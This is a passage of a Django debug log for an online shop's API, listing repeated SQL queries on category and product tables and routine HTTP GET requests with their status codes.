2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 11:11:22,997 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 11:11:23,001 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 11:11:23,003 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 11:11:23,005 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 11:11:23,007 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 11:11:23,009 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 11:11:23,013 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 11:11:23,015 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 11:11:23,017 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 11:11:23,020 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 11:11:23,022 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 11:11:23,024 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 11:11:23,027 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 11:11:23,029 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 11:11:23,032 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 11:11:23,037 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 11:11:23,041 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 11:11:23,046 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 11:11:23,050 utils 2749 140297254205184 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-27 11:11:23,050 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 11:11:23,056 utils 2749 140297254205184 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 11:11:23,059 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 11:11:23,062 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) [27/Dec/2019 11:11:23] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-27 11:11:23,066 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 11:11:23,070 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 11:11:23,072 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 11:11:23,074 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 11:11:23,076 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 11:11:23,079 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 11:11:23,081 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 11:11:23,084 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 11:11:23,086 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 11:11:23,088 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 11:11:23,091 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 11:11:23,094 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 11:11:23] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 11:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 11:15:07] "GET / HTTP/1.0" 302 0 [27/Dec/2019 11:20:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 11:23:09,242 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-27 11:23:09,246 utils 2749 140297243715328 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [27/Dec/2019 11:23:09] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-27 11:23:40,918 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-27 11:23:40,923 utils 2749 140297243715328 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [27/Dec/2019 11:23:40] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-27 11:23:59,615 utils 2749 140297243715328 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-27 11:23:59,621 utils 2749 140297243715328 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [27/Dec/2019 11:23:59] "GET /api/v1/fire/ HTTP/1.0" 200 482 [27/Dec/2019 11:28:39] "GET / HTTP/1.0" 302 0 [27/Dec/2019 11:30:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 11:30:09,678 utils 2749 140297243715328 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 1; args=(1,) [27/Dec/2019 11:30:09] "GET /api/v1/products/1 HTTP/1.0" 200 299 DEBUG 2019-12-27 11:32:25,571 utils 2749 140297243715328 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 1; args=(1,) [27/Dec/2019 11:32:25] "GET /api/v1/products/1 HTTP/1.0" 200 299 [27/Dec/2019 11:35:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 11:36:17,797 utils 2749 140297243715328 (0.004) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 1; args=(1,) [27/Dec/2019 11:36:17] "GET /api/v1/products/1 HTTP/1.0" 200 299 DEBUG 2019-12-27 11:39:00,043 utils 2749 140297243715328 (0.004) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 1; args=(1,) [27/Dec/2019 11:39:00] "GET /api/v1/products/1 HTTP/1.0" 200 299 DEBUG 2019-12-27 11:39:24,050 utils 2749 140297243715328 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 1; args=(1,) [27/Dec/2019 11:39:24] "GET /api/v1/products/1 HTTP/1.0" 200 299 DEBUG 2019-12-27 11:39:45,141 utils 2749 140297243715328 (0.004) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 1; args=(1,) [27/Dec/2019 11:39:45] "GET /api/v1/products/1 HTTP/1.0" 200 299 [27/Dec/2019 11:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 11:40:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 11:42:30,450 utils 2749 140297243715328 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 1; args=(1,) [27/Dec/2019 11:42:30] "GET /api/v1/products/1 HTTP/1.0" 200 299 DEBUG 2019-12-27 11:42:35,791 utils 2749 140297243715328 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 1; args=(1,) [27/Dec/2019 11:42:35] "GET /api/v1/products/1 HTTP/1.0" 200 299 [27/Dec/2019 11:48:52] "GET / HTTP/1.0" 302 0 [27/Dec/2019 11:53:55] "GET / HTTP/1.0" 302 0 [27/Dec/2019 11:58:58] "GET / HTTP/1.0" 302 0 [27/Dec/2019 12:03:59] "GET / HTTP/1.0" 302 0 [27/Dec/2019 12:10:04] "GET / HTTP/1.0" 302 0 [27/Dec/2019 12:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 12:15:07] "GET / HTTP/1.0" 302 0 [27/Dec/2019 12:20:09] "GET / HTTP/1.0" 302 0 [27/Dec/2019 12:25:12] "GET / HTTP/1.0" 302 0 [27/Dec/2019 12:31:32] "GET / HTTP/1.0" 302 0 [27/Dec/2019 12:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 12:36:35] "GET / HTTP/1.0" 302 0 [27/Dec/2019 12:41:37] "GET / HTTP/1.0" 302 0 [27/Dec/2019 12:46:40] "GET / HTTP/1.0" 302 0 [27/Dec/2019 12:51:45] "GET / HTTP/1.0" 302 0 [27/Dec/2019 13:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 13:00:02] "GET / HTTP/1.0" 302 0 [27/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [27/Dec/2019 13:11:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 13:13:56,318 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 13:13:56,324 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 13:13:56,328 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 13:13:56,330 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 13:13:56,333 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 13:13:56,336 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 13:13:56,338 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 13:13:56,340 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 13:13:56,342 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 13:13:56,345 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 13:13:56,347 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 13:13:56,350 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 13:13:56,352 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY 